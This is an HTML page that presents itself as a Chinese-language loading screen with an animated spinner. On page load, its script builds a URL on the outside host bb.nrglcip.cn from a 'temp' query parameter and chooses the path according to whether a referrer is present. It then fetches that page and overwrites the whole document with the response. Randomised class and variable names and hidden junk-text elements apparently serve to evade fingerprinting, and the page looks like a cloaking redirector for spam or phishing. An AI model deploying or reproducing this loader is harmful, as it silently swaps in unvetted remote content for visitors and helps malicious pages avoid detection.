<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .io3tBL {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .io3tBL .FHr6tTS {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .io3tBL .content {
            line-height: 50px;
            text-align: center
        }

        .io3tBL .img {
            width: 100%
        }

        .io3tBL .Kjt6HyGsN {
            text-align: center
        }

        .io3tBL .Kjt6HyGsN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .io3tBL .Kjt6HyGsN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .io3tBL .Kjt6HyGsN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .io3tBL .Kjt6HyGsN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .io3tBL .Kjt6HyGsN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .io3tBL .Kjt6HyGsN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .io3tBL .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YkESIZfEEavH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var nH79QZ = YkESIZfEEavH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ nH79QZ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ nH79QZ +".html?a=share";
		}
		
        X02i6xhP=url+"#"+new Date().getTime();
        X02i6xhP && function() {
            $.get(X02i6xhP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >yYqApzCWKQK6hWMWsti4ML35fyCd9n5XsKpLIJ0LENQcHIHOwQjT</b>
<a  href='#' style='display:none'>Xe7cCxs4xXrOWTsupdGcLnZtH4Gc6XkrNRgSuVHCdOvDeUvAaKEACV42R4mr32h1vwOQmuuPGnlc8aPEpY4vwEucW8UR</a>
<li style='display:none' >uxZnShD2yf2CMtyBnFWoqqCWXNb</li>
<img  src='' style='display:none'>
<b style='display:none' >yYqApzCWKQK6hWMWsti4ML35fyCd9n5XsKpLIJ0LENQcHIHOwQjT</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>Xe7cCxs4xXrOWTsupdGcLnZtH4Gc6XkrNRgSuVHCdOvDeUvAaKEACV42R4mr32h1vwOQmuuPGnlc8aPEpY4vwEucW8UR</a><div class="io3tBL">
    <div class="FHr6tTS">
        <div class="Kjt6HyGsN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>RstBoTtPt2EvngY2ihfOFKhV</p>
<a  href='#' style='display:none'>YIr1amuBs4PMctbojiKaZAn</a>
<p  style='display:none'>RstBoTtPt2EvngY2ihfOFKhV</p>
<span style='display:none'>BnVpXoUaa6JiYZ9GsehZj2lg</span>
<p  style='display:none'>RstBoTtPt2EvngY2ihfOFKhV</p>
<a  href='#' style='display:none'>YIr1amuBs4PMctbojiKaZAn</a></body>
</html>